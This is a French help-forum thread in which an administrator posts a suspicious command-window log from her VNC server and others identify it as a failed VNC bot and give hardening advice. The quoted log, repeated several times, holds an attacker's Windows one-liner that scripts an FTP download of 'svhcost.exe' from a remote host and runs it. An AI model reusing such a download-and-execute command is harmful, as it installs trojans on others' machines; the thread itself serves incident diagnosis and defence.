Intrusions extérieure.

Le
Maeva67
Bonjour,

Je viens de me connecter via VNC sur un serveur dont j'assure la gestion et
je suis étonnée de voir qu'une fenetre de commande était ouverte avec le
texte qui suit.

Aucune des personnes ayant accès à ce serveur n'est assez pointu en
informatique pour effectuer ce genre d'action, ce qui m'amène à soupçonner
une intrusion extérieure.

Qu'a-t-il essayé, voire réussi, à faire? J'ai changé le mot de passe de la
session Windows, y a-t-il un risque qu'il puisse trouver le nouveau mot de
passe?

Comment a-t-il faut pour trouver le mot de passe VNC?

Merci

<<<<

C:WINDOWSsystem32>del eq&echo open 0.0.0.0 18352 >> eq&echo user 14963
26811 >
> eq &echo get svhcost.exe >> eq &echo quit >> eq &ftp -n -s:eq &svhcost.exe
> &de
l eq
Impossible de trouver C:WINDOWSsystem32eq
ftp> open 0.0.0.0 18352
> ftp : connect :Impossible d'attribuer l'adresse demande
ftp> user 14963 26811
Non connect.
ftp> get svhcost.exe
Non connect.
ftp> quit
'svhcost.exe' n'est pas reconnu en tant que commande interne
ou externe, un programme excutable ou un fichier de commandes.

>>>
Vidéos High-Tech et Jeu Vidéo
Téléchargements
Vos réponses Page 1 / 2
Gagnez chaque mois un abonnement Premium avec GNT : Inscrivez-vous !
Trier par : date / pertinence
Nina Popravka
Le #775111
On Sun, 7 Oct 2007 11:04:43 +0200, "Maeva67"
Qu'a-t-il essayé, voire réussi, à faire? J'ai changé le mot de passe de la
session Windows, y a-t-il un risque qu'il puisse trouver le nouveau mot de
passe?


C'est un bot vnc. Ca passe son temps à scanner des plages d'IP à la
recherche de serveurs vnc sans pass, ou avec des failles, et ça lance
un ftp en ligne de commande pour aller ramener un troyen, ça le lance,
et la machine va s'inscrire sur le bot net, et se met à scanner des
plages d'ip etc etc etc...
Là, apparemment, il s'est loupé, mais il est certain que votre serveur
vnc est un gruyère.

Opinion perso : il faut être fou à lier pour installer VNC sur un
serveur, vu la non sécurité du truc. Et encore plus fou pour le faire
tourner sur le port 5900.
Utilisez rdc via une connexion ssh (celui de cygwin, qui est le seul à
jour), comme tous les gens prudents. A moins que ça ne soit un NT4,
avec lequel ça n'est pas possible, du moins pour rdc.
--
Nina

Mathieu CHATEAU
Le #785213
Bonjour,

en supplément de ce que Nina a indiqué, je vous conseil tout de même:
-analyse antispyware & antivirus
-Vérifier qu'il n'y a pas de nouveaux comptes admin local
-Renommer le compte administrateur


--
Cordialement,
Mathieu CHATEAU
English blog: http://lordoftheping.blogspot.com
French blog: http://www.lotp.fr


"Maeva67" news:
Bonjour,

Je viens de me connecter via VNC sur un serveur dont j'assure la gestion
et je suis étonnée de voir qu'une fenetre de commande était ouverte avec
le texte qui suit.

Aucune des personnes ayant accès à ce serveur n'est assez pointu en
informatique pour effectuer ce genre d'action, ce qui m'amène à soupçonner
une intrusion extérieure.

Qu'a-t-il essayé, voire réussi, à faire? J'ai changé le mot de passe de la
session Windows, y a-t-il un risque qu'il puisse trouver le nouveau mot de
passe?

Comment a-t-il faut pour trouver le mot de passe VNC?

Merci

<<<<

C:WINDOWSsystem32>del eq&echo open 0.0.0.0 18352 >> eq&echo user 14963
26811 >
eq &echo get svhcost.exe >> eq &echo quit >> eq &ftp -n -s:eq
&svhcost.exe &de
l eq

Impossible de trouver C:WINDOWSsystem32eq
ftp> open 0.0.0.0 18352
ftp : connect :Impossible d'attribuer l'adresse demande
ftp> user 14963 26811

Non connect.
ftp> get svhcost.exe
Non connect.
ftp> quit
'svhcost.exe' n'est pas reconnu en tant que commande interne
ou externe, un programme excutable ou un fichier de commandes.












Maeva67
Le #785212
"Nina Popravka" news:
On Sun, 7 Oct 2007 11:04:43 +0200, "Maeva67"
Qu'a-t-il essayé, voire réussi, à faire? J'ai changé le mot de passe de la
session Windows, y a-t-il un risque qu'il puisse trouver le nouveau mot de
passe?


C'est un bot vnc. Ca passe son temps à scanner des plages d'IP à la
recherche de serveurs vnc sans pass, ou avec des failles, et ça lance
un ftp en ligne de commande pour aller ramener un troyen, ça le lance,
et la machine va s'inscrire sur le bot net, et se met à scanner des
plages d'ip etc etc etc...
Là, apparemment, il s'est loupé, mais il est certain que votre serveur
vnc est un gruyère.

Opinion perso : il faut être fou à lier pour installer VNC sur un
serveur, vu la non sécurité du truc. Et encore plus fou pour le faire
tourner sur le port 5900.
Utilisez rdc via une connexion ssh (celui de cygwin, qui est le seul à
jour), comme tous les gens prudents. A moins que ça ne soit un NT4,
avec lequel ça n'est pas possible, du moins pour rdc.
--
Nina




Maeva67
Le #785211
"Nina Popravka" news:
On Sun, 7 Oct 2007 11:04:43 +0200, "Maeva67"
Qu'a-t-il essayé, voire réussi, à faire? J'ai changé le mot de passe de la
session Windows, y a-t-il un risque qu'il puisse trouver le nouveau mot de
passe?


C'est un bot vnc. Ca passe son temps à scanner des plages d'IP à la
recherche de serveurs vnc sans pass, ou avec des failles, et ça lance
un ftp en ligne de commande pour aller ramener un troyen, ça le lance,
et la machine va s'inscrire sur le bot net, et se met à scanner des
plages d'ip etc etc etc...
Là, apparemment, il s'est loupé, mais il est certain que votre serveur
vnc est un gruyère.

Opinion perso : il faut être fou à lier pour installer VNC sur un
serveur, vu la non sécurité du truc. Et encore plus fou pour le faire
tourner sur le port 5900.
Utilisez rdc via une connexion ssh (celui de cygwin, qui est le seul à
jour), comme tous les gens prudents. A moins que ça ne soit un NT4,
avec lequel ça n'est pas possible, du moins pour rdc.
--
Nina






Merci pour votre réponse et votre rapidité.

Je ne connais pas rdc, avez-vous plus d'infos, un lien vers un site
internet?


Maeva67
Le #784995
Il y a un antivirus / anti spyware à jour sur le serveur. C'est sans doute
lui qui a empêché l'acction du bot.


"Mathieu CHATEAU" news:%
Bonjour,

en supplément de ce que Nina a indiqué, je vous conseil tout de même:
-analyse antispyware & antivirus
-Vérifier qu'il n'y a pas de nouveaux comptes admin local
-Renommer le compte administrateur


--
Cordialement,
Mathieu CHATEAU
English blog: http://lordoftheping.blogspot.com
French blog: http://www.lotp.fr


"Maeva67" news:
Bonjour,

Je viens de me connecter via VNC sur un serveur dont j'assure la gestion
et je suis étonnée de voir qu'une fenetre de commande était ouverte avec
le texte qui suit.

Aucune des personnes ayant accès à ce serveur n'est assez pointu en
informatique pour effectuer ce genre d'action, ce qui m'amène à
soupçonner une intrusion extérieure.

Qu'a-t-il essayé, voire réussi, à faire? J'ai changé le mot de passe de
la session Windows, y a-t-il un risque qu'il puisse trouver le nouveau
mot de passe?

Comment a-t-il faut pour trouver le mot de passe VNC?

Merci

<<<<

C:WINDOWSsystem32>del eq&echo open 0.0.0.0 18352 >> eq&echo user 14963
26811 >
eq &echo get svhcost.exe >> eq &echo quit >> eq &ftp -n -s:eq
&svhcost.exe &de
l eq

Impossible de trouver C:WINDOWSsystem32eq
ftp> open 0.0.0.0 18352
ftp : connect :Impossible d'attribuer l'adresse demande
ftp> user 14963 26811

Non connect.
ftp> get svhcost.exe
Non connect.
ftp> quit
'svhcost.exe' n'est pas reconnu en tant que commande interne
ou externe, un programme excutable ou un fichier de commandes.
















Nina Popravka
Le #784994
On Sun, 7 Oct 2007 11:49:24 +0200, "Maeva67"
Je ne connais pas rdc,


???
Propriétés système, onglet utilisation à distance, activer le bureau à
distance...
--
Nina

Nina Popravka
Le #778658
On Sun, 7 Oct 2007 11:50:19 +0200, "Maeva67"
Il y a un antivirus / anti spyware à jour sur le serveur. C'est sans doute
lui qui a empêché l'acction du bot.


M'étonnerait.
Il se trouve justement que je m'intéresse aux bots vnc, et j'en ai
toute une collection qui laissent la plupart des anti virus de marbre.
--
Nina

Mathieu CHATEAU
Le #778657
Je dirais plutot que vous avez un firewall qui bloque les connexions
sortantes FTP depuis le serveur

--
Cordialement,
Mathieu CHATEAU
English blog: http://lordoftheping.blogspot.com
French blog: http://www.lotp.fr


"Maeva67" news:%
Il y a un antivirus / anti spyware à jour sur le serveur. C'est sans doute
lui qui a empêché l'acction du bot.


"Mathieu CHATEAU" news:%
Bonjour,

en supplément de ce que Nina a indiqué, je vous conseil tout de même:
-analyse antispyware & antivirus
-Vérifier qu'il n'y a pas de nouveaux comptes admin local
-Renommer le compte administrateur


--
Cordialement,
Mathieu CHATEAU
English blog: http://lordoftheping.blogspot.com
French blog: http://www.lotp.fr


"Maeva67" news:
Bonjour,

Je viens de me connecter via VNC sur un serveur dont j'assure la gestion
et je suis étonnée de voir qu'une fenetre de commande était ouverte avec
le texte qui suit.

Aucune des personnes ayant accès à ce serveur n'est assez pointu en
informatique pour effectuer ce genre d'action, ce qui m'amène à
soupçonner une intrusion extérieure.

Qu'a-t-il essayé, voire réussi, à faire? J'ai changé le mot de passe de
la session Windows, y a-t-il un risque qu'il puisse trouver le nouveau
mot de passe?

Comment a-t-il faut pour trouver le mot de passe VNC?

Merci

<<<<

C:WINDOWSsystem32>del eq&echo open 0.0.0.0 18352 >> eq&echo user 14963
26811 >
eq &echo get svhcost.exe >> eq &echo quit >> eq &ftp -n -s:eq
&svhcost.exe &de
l eq

Impossible de trouver C:WINDOWSsystem32eq
ftp> open 0.0.0.0 18352
ftp : connect :Impossible d'attribuer l'adresse demande
ftp> user 14963 26811

Non connect.
ftp> get svhcost.exe
Non connect.
ftp> quit
'svhcost.exe' n'est pas reconnu en tant que commande interne
ou externe, un programme excutable ou un fichier de commandes.




















Maeva67
Le #778656
Ah oki !! RDC = Remote Desktop Controler ...

J'avais pas capté ;)

Merci

"Nina Popravka" news:
On Sun, 7 Oct 2007 11:49:24 +0200, "Maeva67"
Je ne connais pas rdc,


???
Propriétés système, onglet utilisation à distance, activer le bureau à
distance...
--
Nina




F. Dunoyer [MVP]
Le #778655
Maeva67 a utilisé son clavier pour écrire :
Ah oki !! RDC = Remote Desktop Controler ...

J'avais pas capté ;)

Merci

"Nina Popravka" news:
On Sun, 7 Oct 2007 11:49:24 +0200, "Maeva67"
Je ne connais pas rdc,


???
Propriétés système, onglet utilisation à distance, activer le bureau à
distance...
-- Nina

Si ça peut te rassurer RDC ça ne me parle pas non plus :)


client TSE oui
RDP (le protocole sur lequel s'appuie le client Bureau à DIstance) oui
Bureau à distance etc...

--
François Dunoyer [MVP Windows Server / Security]
Quelques liens pour Windows : http://fds.mvps.org/AdressesInternets.htm
Site perso : http://www.fdunoyer.net



Publicité
Poster une réponse
Anonyme